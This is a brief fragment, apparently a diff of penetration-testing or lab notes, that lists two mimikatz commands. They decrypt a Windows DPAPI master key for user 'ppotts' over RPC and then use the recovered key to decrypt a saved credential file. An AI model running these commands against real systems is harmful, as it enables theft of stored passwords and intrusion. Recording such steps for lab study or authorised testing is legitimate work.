mimikatz

 .\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exit

-• getting creds after getting master key
+• Getting creds after getting the master key

 .\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit